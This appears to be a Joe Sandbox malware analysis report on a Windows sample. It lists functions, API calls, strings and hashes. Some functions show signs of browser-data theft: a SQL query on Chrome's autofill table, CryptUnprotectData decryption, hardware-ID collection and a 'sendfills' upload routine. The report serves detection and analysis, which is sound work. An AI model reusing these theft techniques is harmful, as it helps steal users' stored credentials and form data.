String ID: Error initializing IWbemLocator: CLASS_E_NOAGGREGATION$Error initializing IWbemLocator: E_NOINTERFACE$Error initializing IWbemLocator: E_POINTER$Error initializing IWbemLocator: REGDB_E_CLASSNOTREG$Error initializing IWbemLocator: Unknown Error$PyL$The COM library is already initialized on this thread
API String ID: 3484948060-395090040
Opcode ID: 2b7550c95536fdbadaa5eef527c635e63f381946ddc622ee56f4ae9e8117d395
Instruction ID: 317c5526c87e3aa390ef5cbcb497ca27ab095745efdf6638258edbaf30826e98
Opcode Fuzzy Hash: 2b7550c95536fdbadaa5eef527c635e63f381946ddc622ee56f4ae9e8117d395
Instruction Fuzzy Hash: 1EB19A75A003199FCB14DF58C895F9EBBF4BF88300F14856EE845A33A1DB74AA04CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004C3120 Relevance: 21.6, APIs: 2, Strings: 12, Instructions: 607COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,00000210), ref: 004C321F

Strings

f66f7a17b78ba617acde90fc810107f34f1a1f2e, xrefs: 004C317E, 004C36E7, 004C3819, 004C38B0
automatic extension loading failed: %s, xrefs: 004C37D3
misuse at line %d of [%.10s], xrefs: 004C3188, 004C36F1, 004C3823, 004C38BA
@OD, xrefs: 004C3275, 004C3640, 004C375F, 004C3929
MATCH, xrefs: 004C3621, 004C362F, 004C364F, 004C3650, 004C3670
API call with %s database connection pointer, xrefs: 004C36D8, 004C380A, 004C38A1
main, xrefs: 004C35C4
invalid, xrefs: 004C36D3, 004C3805, 004C389C
temp, xrefs: 004C35D4
BINARY, xrefs: 004C3292, 004C336A, 004C3381, 004C33B7
RTRIM, xrefs: 004C3398
NOCASE, xrefs: 004C33E1

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memset
String ID: @OD$API call with %s database connection pointer$BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$f66f7a17b78ba617acde90fc810107f34f1a1f2e$invalid$main$misuse at line %d of [%.10s]$temp
API String ID: 2221118986-1574462364
Opcode ID: 9a1def367b6be142b6eba70c21b76447857f9b49edfbfb8731f8a99487b21e41
Instruction ID: 9ba5297a5df4abf15fe2592adb90282ee1a59190de899c21962a10aa16c21a53
Opcode Fuzzy Hash: 9a1def367b6be142b6eba70c21b76447857f9b49edfbfb8731f8a99487b21e41
Instruction Fuzzy Hash: D5323AB4600700ABE7609F25D845F677BE0BF40309F14892EF5464B792D7B9EA48CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004A77A0 Relevance: 18.8, APIs: 3, Strings: 9, Instructions: 806COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,0000004C), ref: 004A78E2
memmove.VCRUNTIME140(00000000,?,?), ref: 004A7FCE
memmove.VCRUNTIME140(00000000,?,?), ref: 004A8058

Strings

too many columns in result set, xrefs: 004A8175
%s.%s.%s, xrefs: 004A806F
no such table: %s, xrefs: 004A813E
, xrefs: 004A7F27
Expression tree is too large (maximum depth %d), xrefs: 004A7E72, 004A7F19
too many references to "%s": max 65535, xrefs: 004A7B6D
sqlite_sq_%p, xrefs: 004A78F7
%s.%s, xrefs: 004A7F36
no tables specified, xrefs: 004A8151

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$memset
String ID: $%s.%s$%s.%s.%s$Expression tree is too large (maximum depth %d)$no such table: %s$no tables specified$sqlite_sq_%p$too many columns in result set$too many references to "%s": max 65535
API String ID: 3790616698-4201911402
Opcode ID: 1b3d6245a8063877683383aa0078ce2378249402b9920bb88658b75477cf1b92
Instruction ID: 1472e183687450ae85293334cd107d492df119b59b8a8c09b42468dfbbd29918
Opcode Fuzzy Hash: 1b3d6245a8063877683383aa0078ce2378249402b9920bb88658b75477cf1b92
Instruction Fuzzy Hash: C862A3706083018FD724DF29C880A6BB7E1FF9A314F14496EE8998B352D739ED45CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004CC710 Relevance: 18.5, APIs: 12, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31c764cc32f5af8ce1f47df4220ec303c35305c65e78bbcf107d3625c2956ff8
Instruction ID: 4651de985ef3b2fb2cea00cdd1ad8bc759d8ac7ed0a5b189e137bb1d1532114b
Opcode Fuzzy Hash: 31c764cc32f5af8ce1f47df4220ec303c35305c65e78bbcf107d3625c2956ff8
Instruction Fuzzy Hash: 4C129BB96083059FD760DF28C884B6BB7E4EF98304F44482EF98AD7350E779D9058B66

Uniqueness

Uniqueness Score: -1.00%

Function 00451A40 Relevance: 18.5, APIs: 6, Strings: 6, Instructions: 485COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(00000000,?,?), ref: 00451AEF
memset.VCRUNTIME140(00000000,00000000,?), ref: 00451B51
memmove.VCRUNTIME140(00000028,00000000,00000000), ref: 00451BA6
memmove.VCRUNTIME140(?,?,00000000), ref: 00451BC0
memmove.VCRUNTIME140(?,00000000,00000000), ref: 00451BD3
memmove.VCRUNTIME140(?,00000000,00000000), ref: 00451C0D

Strings

f66f7a17b78ba617acde90fc810107f34f1a1f2e, xrefs: 00451DF6
(, xrefs: 00451A98
-wal, xrefs: 00451C1B
cannot open file at line %d of [%.10s], xrefs: 00451E00
immutable, xrefs: 00451E46
nolock, xrefs: 00451CC8

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$memset
String ID: ($-wal$cannot open file at line %d of [%.10s]$f66f7a17b78ba617acde90fc810107f34f1a1f2e$immutable$nolock
API String ID: 3790616698-2828069661
Opcode ID: c2e4ece8c17ab2cb08d7dcfe2ed15f17a59fde175889128ce99a63f73ba568be
Instruction ID: 6cb7692ccfed63013f8987187454d7bda97d6fc0c5c34ce31dc01de82bfdf153
Opcode Fuzzy Hash: c2e4ece8c17ab2cb08d7dcfe2ed15f17a59fde175889128ce99a63f73ba568be
Instruction Fuzzy Hash: 9A0206B1A003469FDB10CF68C8417AFBBF0AF45318F18456EE8599B392E739AD09CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00522010 Relevance: 15.4, APIs: 10, Instructions: 442fileCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010040,3A5313C3,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0052206E
memset.VCRUNTIME140(00000000,00000000,00010040,?,?,?,?,?,?,?,?,?,?,?,?,00530E85), ref: 00522088
CreateFileW.KERNELBASE(?,00000001,00000007,00000000,00000003,02200000,00000000), ref: 0052219C
GetLastError.KERNEL32 ref: 005221CA
GetLastError.KERNEL32 ref: 005222DF
GetLastError.KERNEL32 ref: 00522349
GetLastError.KERNEL32 ref: 005223E8
GetLastError.KERNEL32 ref: 0052255A
CloseHandle.KERNEL32(00000000,00000000,0055A400), ref: 00522577

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: ErrorLast$CloseCreateFileHandlemallocmemset
String ID:
API String ID: 2811957645-0
Opcode ID: 1b8a771efe19207aef481cb8c680bb54421e2a29bd0146ad3d1c931afea1ba2a
Instruction ID: 9b3f343b2034816d98a11dc4a271e8ae016ee70b5559c7d5d09fa6a086ffab9a
Opcode Fuzzy Hash: 1b8a771efe19207aef481cb8c680bb54421e2a29bd0146ad3d1c931afea1ba2a
Instruction Fuzzy Hash: 4BF13478A00214EBDF24CFA8EC99BAE7FB4BF52304F244619E405AB2D1D7B49949CB51

Uniqueness

Uniqueness Score: -1.00%

Function 004EE4B0 Relevance: 15.3, APIs: 10, Instructions: 284networksleepCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00002726), ref: 004EE51A
WSASetLastError.WS2_32(00002726,?,?,00000000,?), ref: 004EE6A5
WSASetLastError.WS2_32(00002726,?,?,00000000,?), ref: 004EE6D6
Sleep.KERNEL32(FFFFFFFE), ref: 004EE6FD
select.WS2_32(?,?,?,?,00000000), ref: 004EE75B
WSAGetLastError.WS2_32 ref: 004EE76C
__WSAFDIsSet.WS2_32(?,?), ref: 004EE7AD
__WSAFDIsSet.WS2_32(?,?), ref: 004EE7E2
__WSAFDIsSet.WS2_32(?,?), ref: 004EE800
Sleep.KERNEL32(FFFFFFFE), ref: 004EE862

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: ErrorLast$Sleep$select
String ID:
API String ID: 2442476585-0
Opcode ID: d88117363e3a7b9f2d27b0f93e3493074bbcb83196a1eacd31d8bd0b63828a0e
Instruction ID: eee82ed37d400087fac2d95dfe51ad3b40ca6d070a54a064c0cddd8f128ce223
Opcode Fuzzy Hash: d88117363e3a7b9f2d27b0f93e3493074bbcb83196a1eacd31d8bd0b63828a0e
Instruction Fuzzy Hash: EBA1B3705043918BD7399F6BD88466BB2E5BFD8316F544E2EE899C72D0EB38C844C74A

Uniqueness

Uniqueness Score: -1.00%

Function 00411D70 Relevance: 12.1, APIs: 8, Instructions: 124encryptionCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?), ref: 00411D92
memset.VCRUNTIME140(00000000,00000000,?,?), ref: 00411DA7
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(-00000005,?,?,?,?), ref: 00411E2E
memset.VCRUNTIME140(00000000,00000000,-00000005,?,?,?,?,?), ref: 00411E3D
memmove.VCRUNTIME140(00000000,?,-00000005,?,?,?,?,?,?,?,?), ref: 00411E53
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00411E73
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 00411EAE
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 00411EB4

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: freemallocmemset$CryptDataUnprotectmemmove
String ID:
API String ID: 3355600937-0
Opcode ID: 38912f9446927c3b1b60179e62d066f4d2de14bb1fc4d61dc0804c03eb8e1f5f
Instruction ID: 3ac26e07f884ff3f74fde8ddca6b5e7b59ece1e825ba937d4f58e3b5451ac78f
Opcode Fuzzy Hash: 38912f9446927c3b1b60179e62d066f4d2de14bb1fc4d61dc0804c03eb8e1f5f
Instruction Fuzzy Hash: A5310471E002199BCB10DFA8AC45AFFBBB9EF8A300F04056AED05A7351E635AD45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 004C0120 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

`ND, xrefs: 004C0169
@OD, xrefs: 004C01BB, 004C034A, 004C0591
gfff, xrefs: 004C0510
OD, xrefs: 004C0162, 004C05B4

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID:
String ID: OD$@OD$`ND$gfff
API String ID: 0-1781588136
Opcode ID: 78bb2727d0bd943f0b5efb9f52ddbf09b6697f578d954bc7e17aeb22c329ba8e
Instruction ID: 1801bd747addc30cff3ffca259dba91071af98a500227c0d3608eec5401b957e
Opcode Fuzzy Hash: 78bb2727d0bd943f0b5efb9f52ddbf09b6697f578d954bc7e17aeb22c329ba8e
Instruction Fuzzy Hash: F8C19175901300DBE750CF25EE75B223BA0FBA430AF14422FE90596761E779988CEB4B

Uniqueness

Uniqueness Score: -1.00%

Function 00497700 Relevance: 9.5, APIs: 2, Strings: 4, Instructions: 451COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,Function_00144378), ref: 004978AA

Strings

f66f7a17b78ba617acde90fc810107f34f1a1f2e, xrefs: 00497747
misuse at line %d of [%.10s], xrefs: 00497751
@OD, xrefs: 0049778B, 004978E8
d, xrefs: 00497977

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memset
String ID: @OD$d$f66f7a17b78ba617acde90fc810107f34f1a1f2e$misuse at line %d of [%.10s]
API String ID: 2221118986-2913509980
Opcode ID: 0065db86bc1a2f20cf9b710bd10ed824bd57755b8006ba2a6c3ef8edd5c2d848
Instruction ID: e312ec190fc8f232ab039ec75e576a93e45f81eac571ecb1d080f621e27422ec
Opcode Fuzzy Hash: 0065db86bc1a2f20cf9b710bd10ed824bd57755b8006ba2a6c3ef8edd5c2d848
Instruction Fuzzy Hash: 8A02AB706183019BDB14DF25C49576BBBE1BF84708F18493EE8498B352EB79EC45CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00452800 Relevance: 9.4, APIs: 3, Strings: 3, Instructions: 448COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,?,?,00000000,?), ref: 004529B1
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,00000000,?), ref: 004529E5
memset.VCRUNTIME140(?,00000000,?,?), ref: 00452CA4

Strings

f66f7a17b78ba617acde90fc810107f34f1a1f2e, xrefs: 0045285E, 00452CC0
pD, xrefs: 00452D0F
database corruption at line %d of [%.10s], xrefs: 00452868, 00452CCA

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memset
String ID: database corruption at line %d of [%.10s]$f66f7a17b78ba617acde90fc810107f34f1a1f2e$pD
API String ID: 2221118986-990763812
Opcode ID: 4485ddc3674b5f1d7315caf583a8df36b761abd003398d08f00e7197dab8d055
Instruction ID: f9c4053d8d4c793055fd623119876f1482ea83275721e751015ae339199ff302
Opcode Fuzzy Hash: 4485ddc3674b5f1d7315caf583a8df36b761abd003398d08f00e7197dab8d055
Instruction Fuzzy Hash: 1DF1DE71A002118BDB25DF24C980B2BB7E0AF89315F14456FEC489B353D7B9EC49CB96

Uniqueness

Uniqueness Score: -1.00%

Function 005225B0 Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,3A5313C3,?,?,?), ref: 005226ED

Part of subcall function 00521F90: CloseHandle.KERNEL32(00000000,3A5313C3,?,?,0052EA60,000000FF,?,00522700,?,?,?,?,?,?,3A5313C3,?), ref: 00521FCF

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 14ec008932118807850e6476e1a210f5eb15fb1d0c1d7bedbb52abf7ac7f6380
Instruction ID: 0a0c7ddb822a2c947ff267328616a1435d4ae548cbdeab8fc84b0432bab61601
Opcode Fuzzy Hash: 14ec008932118807850e6476e1a210f5eb15fb1d0c1d7bedbb52abf7ac7f6380
Instruction Fuzzy Hash: 7F71ED76200712ABD324CB29ED81B9ABBE4FF8A704F54042CF589D7690EB74F815CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00416C2F Relevance: 87.4, APIs: 29, Strings: 20, Instructions: 1696
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,00000000,00545E10,00000000,; Value: ,00000000,00000001), ref: 00416CC4
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,0054423C), ref: 00416D4B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,00000000,?,0054423C), ref: 00416E1F

Part of subcall function 004104B0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00410530
Part of subcall function 004104B0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00410578

Part of subcall function 005272E0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,02000000,00000000,00000002,00000000,3A5313C3,75920630,?), ref: 005273CB
Part of subcall function 005272E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052740A

omp_get_thread_num.VCOMP140(00000000,?,?,00000000,?,?,?,?,?,?,00000010,?), ref: 00416E93
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00545CD8,?,?,00000000,?,?,?,?,00000000,?,0054423C), ref: 004170ED
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004172BD
memmove.VCRUNTIME140(?,?,00000000,00545E10,00000000,; Value: ,00000000,00000001), ref: 0041752F

Part of subcall function 004055E0: memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,?,00000000), ref: 004056B1
Part of subcall function 004055E0: memmove.VCRUNTIME140(00000000,?,?,00000000,7FFFFFFF,00000000,?,00000000), ref: 004056C2

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?), ref: 00417787
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(\Temp\,00000000,?), ref: 00417819
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00417904
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 0041795A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00417B40
memset.VCRUNTIME140(?,?,?,?,00000000,000000B0), ref: 00417B79
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,000000B0,?,?,?,?,?,.txt,00000000), ref: 00417BDC
memset.VCRUNTIME140(?,00000000,00000108,.txt,?,?,?,?,?,?,?,?,?,?,?,\Temp\), ref: 00417BF7
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000010,?), ref: 00417D6F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,hwid,00000004,?,?,?,?,?,?,?,00000010,?), ref: 00417E12
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,name,00000004,?,?,?,?,?,?,?,hwid,00000004), ref: 00417EB2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,log,00000003,?,?,?,?,?,?,?,name,00000004), ref: 00417F52

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0041805C

Part of subcall function 004022D0: ?_Xbad_function_call@std@@YAXXZ.MSVCP140([HTTPClient][Error] Curl session is not initialized ! Use InitSession() before.,0000004F,3A5313C3), ref: 0040233C
Part of subcall function 004022D0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00402371

Part of subcall function 005278D0: CreateFileW.KERNELBASE(?,00010198,00000007,00000000,00000003,02200000,00000000,3A5313C3,?,?,?,?,?,0053138D,000000FF,?), ref: 00527945
Part of subcall function 005278D0: GetLastError.KERNEL32(?,?,0053138D,000000FF,?,?,00554964,boost::filesystem::status), ref: 0052795C
Part of subcall function 005278D0: CloseHandle.KERNEL32(00000000,boost::filesystem::status), ref: 005279C4

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000015,0055A650,00000015,sendfills,00000009), ref: 004181C1
?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,?,00000015,0055A650,00000015,sendfills,00000009), ref: 004182A8
?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(00000010,00000010,?,?,?,?,00000015,0055A650,00000015,sendfills,00000009), ref: 004182CC
??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,?,00000015,0055A650,00000015,sendfills,00000009), ref: 004182EC
??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,?,00000015,0055A650,00000015,sendfills,00000009), ref: 004182F8
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,?,00000015,0055A650,00000015,sendfills,00000009), ref: 00418304
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000015,0055A650,00000015,sendfills,00000009), ref: 004183C4
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000015,0055A650,00000015,sendfills,00000009), ref: 0041847E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00545CD8,\Temp\tmp), ref: 004185B5

Strings

; Value: , xrefs: 00417424
\Temp\, xrefs: 004177A2
4, xrefs: 0041828B
]@, xrefs: 0041826D
BT, xrefs: 00418278
idb, xrefs: 00417CD9
Name: , xrefs: 004173C8
/, xrefs: 00418011
hwid, xrefs: 00417D81
SELECT name, value FROM autofill, xrefs: 004172FB
_Fills_, xrefs: 004179AB
<BT, xrefs: 004172E3, 004172F8, 004176E6
\Temp\tmp, xrefs: 00416EB7
log, xrefs: 00417EC4
count, xrefs: 00417F74
sendfills, xrefs: 00418097
.txt, xrefs: 00417A24
e_user, xrefs: 00417D14, 00417D30
name, xrefs: 00417E24
@J@, xrefs: 00418296

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$D@std@@@std@@U?$char_traits@$memmove$CreateFilememset$??1?$basic_ios@??1?$basic_ostream@??1?$basic_streambuf@?eback@?$basic_streambuf@?setg@?$basic_streambuf@?setstate@?$basic_ios@CloseD00@ErrorHandleLastXbad_function_call@std@@omp_get_thread_num
String ID: .txt$/$4$; Value: $<BT$@J@$Name: $SELECT name, value FROM autofill$\Temp\$\Temp\tmp$_Fills_$count$e_user$hwid$idb$log$name$sendfills$BT$]@
API String ID: 646026208-1173949958
Opcode ID: 1818f0b22081c880918a39ac737a0d7560c1fb55dfed3e5068f160492c649d9e
Instruction ID: fa467e2904d195338d6c269fc27335adbd8de100e67709850f2aa1240661ed29
Opcode Fuzzy Hash: 1818f0b22081c880918a39ac737a0d7560c1fb55dfed3e5068f160492c649d9e
Instruction Fuzzy Hash: C8F2E370A002589FEB19DB68CD88BDDBB75AF55304F1082D9E009AB2D2DB799BC4CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004C59B0 Relevance: 63.4, APIs: 23, Strings: 13, Instructions: 418
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SafeArrayGetLBound.OLEAUT32(00000000,00000001,?), ref: 004C5A43
SafeArrayGetUBound.OLEAUT32(00000000,00000001,?), ref: 004C5A52
SafeArrayGetElement.OLEAUT32(00000000,?,00000000), ref: 004C5A72
_CxxThrowException.VCRUNTIME140(?,005557D8,?,00000000,?,00000000,00000040,00000000,?,3A5313C3), ref: 004C5C75
_CxxThrowException.VCRUNTIME140(?,005557D8,?,80041008,?,00000000,00000040,00000000,?,3A5313C3), ref: 004C5CA8
_CxxThrowException.VCRUNTIME140(?,005557D8,?,80041006,?,00000000,00000040,00000000,?,3A5313C3), ref: 004C5CDB
_CxxThrowException.VCRUNTIME140(?,005557D8,?,80041001,?,00000000,00000040,00000000,?,3A5313C3), ref: 004C5D0E
_CxxThrowException.VCRUNTIME140(?,005557D8,?,00000000,?,00000000,00000040,00000000,?,3A5313C3), ref: 004C5D3D
_CxxThrowException.VCRUNTIME140(?,005557D8,?,80070057,?,00000000,00000040,00000000,?,3A5313C3), ref: 004C5D70
_CxxThrowException.VCRUNTIME140(?,005557D8,?,8007000E,?,00000000,00000040,00000000,?,3A5313C3), ref: 004C5DA3
_CxxThrowException.VCRUNTIME140(?,005557D8,?,8002000B,?,00000000,00000040,00000000,?,3A5313C3), ref: 004C5DD6
_CxxThrowException.VCRUNTIME140(?,005557D8,?,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000,00000040,00000000,?,3A5313C3), ref: 004C5E08
_CxxThrowException.VCRUNTIME140(?,005557D8,?,00000000,?,005557D8,?,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004C5E3A
_CxxThrowException.VCRUNTIME140(?,005557D8,?,00000000,?,005557D8,?,00000000,?,005557D8,?,00000000,?,00000000,00000000,?), ref: 004C5E6C
_CxxThrowException.VCRUNTIME140(?,005557D8,?,00000000,?,005557D8,?,00000000,?,005557D8,?,00000000,?,005557D8,?,00000000), ref: 004C5E9E
_CxxThrowException.VCRUNTIME140(?,005557D8,?,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000,00000040,00000000,?,3A5313C3), ref: 004C5ED0
_CxxThrowException.VCRUNTIME140(?,005557D8,00000000,?), ref: 004C5F86

Strings

Could not get name from SafeArray: DISP_E_BADINDEX, xrefs: 004C5DA8
Could not get properties: WBEM_E_OUT_OF_MEMORY, xrefs: 004C5CAD
Could not get property: Unknown Error, xrefs: 004C5EA3
Could not get properties: WBEM_E_FAILED, xrefs: 004C5C4B, 004C5CE0
Can't convert parameter: , xrefs: 004C5F0D
Could not get name from SafeArray: E_INVALIDARG, xrefs: 004C5D42
Could not get property: WBEM_E_FAILED, xrefs: 004C5DDB
Could not get name from SafeArray: Unknown Error, xrefs: 004C5D13
Could not get property: WBEM_E_INVALID_PARAMETER, xrefs: 004C5E0D
Could not get property: WBEM_E_OUT_OF_MEMORY, xrefs: 004C5E71
Could not get properties: WBEM_E_INVALID_PARAMETER, xrefs: 004C5C7A
Could not get property: WBEM_E_NOT_FOUND, xrefs: 004C5E3F
Could not get name from SafeArray: E_OUTOFMEMORY, xrefs: 004C5D75

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: ExceptionThrow$ArraySafe$Bound$Element
String ID: Can't convert parameter: $Could not get name from SafeArray: DISP_E_BADINDEX$Could not get name from SafeArray: E_INVALIDARG$Could not get name from SafeArray: E_OUTOFMEMORY$Could not get name from SafeArray: Unknown Error$Could not get properties: WBEM_E_FAILED$Could not get properties: WBEM_E_INVALID_PARAMETER$Could not get properties: WBEM_E_OUT_OF_MEMORY$Could not get property: Unknown Error$Could not get property: WBEM_E_FAILED$Could not get property: WBEM_E_INVALID_PARAMETER$Could not get property: WBEM_E_NOT_FOUND$Could not get property: WBEM_E_OUT_OF_MEMORY
API String ID: 2571534010-1455836236
Opcode ID: 93be9289069cd0a9b495c9ff486b8578173a48050ff58d04c15d7baced77394f
Instruction ID: 370bbe60557d7a57a514092b149593a30f86a33fc60fb0669a03c76f47dd3a89
Opcode Fuzzy Hash: 93be9289069cd0a9b495c9ff486b8578173a48050ff58d04c15d7baced77394f
Instruction Fuzzy Hash: 2DF1B275D00218EECB10DBA4DC55FDEBBB8BF59304F10846AE405B3291EB796B88CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00423600 Relevance: 49.8, APIs: 12, Strings: 16, Instructions: 801
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405950: memmove.VCRUNTIME140(?,?,00000000,?,?,00000000,811C9DC5,?,00000000,00000001,811C9DC5,?), ref: 00405A16
